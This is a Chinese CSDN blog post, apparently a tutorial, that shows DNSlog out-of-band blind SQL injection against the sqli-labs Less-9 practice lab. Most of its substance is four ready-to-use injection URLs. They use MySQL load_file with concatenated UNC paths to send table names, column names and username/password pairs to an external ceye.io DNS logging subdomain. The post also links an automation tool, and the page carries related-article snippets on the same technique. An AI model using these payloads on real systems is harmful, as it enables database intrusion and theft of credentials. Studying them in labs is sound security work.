DNSlog盲注

最新推荐文章于 2023-08-07 01:13:43 发布
最新推荐文章于 2023-08-07 01:13:43 发布
阅读量104 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42478365/article/details/114524886
版权

原因(该方法只适合在windows服务器上)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

案例:

根据数据库查表:
http://192.168.239.146/sqli-labs-master/Less-9/?id=1' and load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.hzaskx.ceye.io\\abc'))--+


#### 根据表查字段


http://192.168.239.146/sqli-labs-master/Less-9/?id=1' and load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='users' limit 0,1),'.hzaskx.ceye.io\\abc'))--+


#### 最后查询数据内容:

```powershell
http://192.168.239.146/sqli-labs-master/Less-9/?id=1' and load_file(concat('\\\\',(select concat_ws('A',username,password) from security.users limit 0,1),'.hzaskx.ceye.io\\abc'))--+

或者:

http://192.168.239.146/sqli-labs-master/Less-9/?id=1' and load_file(concat('\\\\',(select hex(concat_ws('-',username,password)) from security.users limit 0,1),'.hzaskx.ceye.io\\abc'))--+

使用代码进行DNSlog注入的代码地址:https://github.com/ADOOO/DnslogSqlinj

冯·诺依曼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DNSLog 总结
m0_61506558的博客
10-26 501
总所周知,我们输入的域名需要通过DNS服务器进行解析得到IP地址才能通过IP访问网站,DNSLog就是存储在DNS服务器上的域名信息,它记录着用户对域名访问的信息,类似日志文件。我们只需要搭建一个的DNS服务器,并将要打或的回显,放到自己域名的二级三级甚至更多级的子域名上去请求,就可以通过DNS解析日志来获取到它们。这样,所有访问 xie.com 的二级三级四级等等子域名都会被解析到我们的VPS上。我们就可以通过查询DNS解析记录来获得命令执行的回显了。(一)DNSLog部署过程。
dnslog server
09-08
DNSlog Server是一个专门用于DNS日志记录和分析的工具,主要应用于网络安全领域,特别是渗透测试和应急响应。在本文中,我们将深入探讨DNSlog Server的工作原理、用途以及如何利用它来提升网络安全。 **DNSlog ...
dnslog
qq_50854662的博客
07-14 893
dnslogdnslog入原理DNSlog工具什么情况下使用dnslog入?Mysql DNSlog原理图DNSlog利用条件DNSlog操作方式实战演练查询当前数据库名:查询当前数据库的第一个表名:查询第users表一个列名:查询users表的username列的数据:需要意的点: dnslog入原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错入,将变显错入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问
编解码入、二次入、DNSlog
leekos的博客,分享web安全相关知识~
12-06 755
编解码、二次入、DNSlog
SQL入学习-Dnslog
笑花大王
02-17 666
1.基础知识 1.DNS DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明,RF...
DNSlog入(利用DNSlog平台将SQL变成回显入)
柠檬i的博客
08-07 1226
DNSlog入是一种利用DNS服务器记录域名解析请求的特性,来获取SQL入结果的技术。它的原理是通过构造一个包含数据库信息的子域名,然后使用MySQL的load_file函数或其他方法,让目标服务器向DNS服务器发起解析请求,从而在DNS服务器上留下入结果的痕迹。
DNSLog-Platform-Golang:DNSLOG平台golang一键启动版
04-02
DNSLog-平台-Golang相信DNSLog平台已经是安全从业者的标配。而公开的DNSLOG平台域名早已进入流量监控设备的规则库。同时也有重大问题值得关。于是撸了(凑了)一个一键建造Dnslog平台的golang版本。可以使用其一键...
无回显漏洞测试及SSRF辅助平台提供DNSLOG,HTTPLOG等功能
01-20
平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 主要功能 DNSLOG HTTPLOG 自定义DNS解析 DNS Rebinding 自定义HTTP Response(Response内容、状态码、Header...
dnslog:简约的 DNS 日志记录工具
05-31
捕获所有 DNS 流量并将其文本表示(以压缩形式)存储到/var/log/dnslog/<date>.log.gz 。 创建用于网络取证目的。 $ zcat /var/log/dnslog/2018-07-12.log.gz | head 00:00:00.001595 R A 192.168.107.168 192....
DNSlog-GO:DNSLog-GO是一种golang编写的监控DNS解析记录的工具,自带WEB接口
03-08
简介DNSLog-GO是一种golang编写的监控DNS解析记录的工具,自带WEB接口安装详细图文教程: : 1.获取发行版这里下载最新发行版,并解压2.域名与公网IP准备搭建并使用 DNSLog,你需要拥有两个域名,一个域名作为 NS ...
SQL入--时间入-报错入-布尔-DNSlog入-宽字节入-WAF绕过-SqlMap使用
VictorZhang
07-30 5997
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https://github.com/webattacker/sqli-labs 将Sqli-labs解压后整个目录拖拽到路劲:C:\wamp64\www 下 3.在浏览器上访问http://localhost...
dnslog入_dnslog
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1772
dnslog入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错入,将dnslog变显错入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog入主要用于布尔型、时间型、有入但是无显示,入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
利用DNSlog进行sql
weixin_44743506的博客
08-30 2202
一、原理 测试一些网站的时候,一些入都是无回显的,手工效率太低,我们可以写脚本来进行,但有些网站会ban掉我们的ip,虽然可以通过设置ip代理池解决,但是往往效率很低,所以产生了DNSlog入。 首先有一个可以用于dns解析的域名,比如ceye.io。通过代理商设置域名ceye.io的nameserver为自己的服务器a,再在服务器a上配置好dns服务器,这样所有ceye.io...
dnslog原理
rane的博客
03-18 1831
Dnslog原理 布尔和时间相当于猜单词的游戏,我们需要对每一位逐步的猜测,效率很低,需要发送很多的请求进行判断,很可能会触发安全设备的防护 我们需要一种方式能够减少请求,直接回显数据——Dnslog入 Dns在解析的时候会留下日志,通过读取多级域名的解析日志,获取请求信息 Dnslog方法 登录http://ceye.io/网站并册,得到属于自己的identifier 先尝试...
DNSLOG
秋水的博客
09-02 8861
入简介 什么是dnslog入? dnslog入也可以称之为dns带外查询,是一种入姿势,可以通过查询相应的dns解析记录,来获取我们想要的数据 为什么要进行dnslog入? 一般情况下,在我们无法通过联合查询直接获取数据的情况下,我们只能通过,来一步步的获取数据,但是,使用,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使...
dnslog在mysql在linux_DNSlog平台各种利用姿势(
weixin_30588427的博客
02-23 605
题记首先祝大家新年快乐,过年给我最大的感觉就是几家欢喜几家愁,我们国家总量看似光鲜,可是平均下来也不多,小老百姓更不容易了,一般没有文化的百姓除了创业就是打工就是中间商赚差价,真是生活不易,加油,一起建设新中国。DNSlog我以前是通过看推文了解过,后来零组上架了这么个功能,想着试试,后来发现零组的好像还用不了,还是用别的平台吧,这是可以利用它进行快速的工具,看完大佬们的文章复现完受益良多,g...
Web渗透测试之SQL入:特别篇--DNSlog
vodkaDL的博客
11-16 446
文章目录前言DNSlog入原理平台示例总结 前言   前两篇依次讲解了布尔和时间,二者本质上并无太大区别。但由于本身的弊端导致在现代渗透测试进行时二者难有用武之地,在中真正发挥作用的是DNSlog。因此本篇将会着重讲解DNSlogDNSlog入   在讲解布尔时笔者提到过的关键点就在于一个“”字,而产生“”的原因就在于页面无回显,这就导致了我们只能通过其它表征(如页面对错、时间差等)来不断猜解拼凑我们想要的信息。因此本身的性质决定了如果进行手工费时费力
SQL入之利用DNSlog外带回显
baynk的博客
03-31 5954
0x00 SQL 当我们发现一个站点存在一个没有数据回显的入点进行入时,只能采取,这种入速度非常慢,需要一个一个字符猜解,而且很容易被网站BAN掉IP,虽然也可以使用代理IP池,但是还是需要一种快速有效的方法来获取数据。 此时我们就可以利用DNSlog来快速的获取数据,当然我们也可以在无回显的命令执行或者无回显的SSRF中利用。 0x01 DNSlog利用条件 DBMS中需要有可...
linux dnslog
最新发布
08-10
- *1* *2* *3* [DNSlog平台各种利用姿势()](https://blog.csdn.net/weixin_30588427/article/details/114493929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值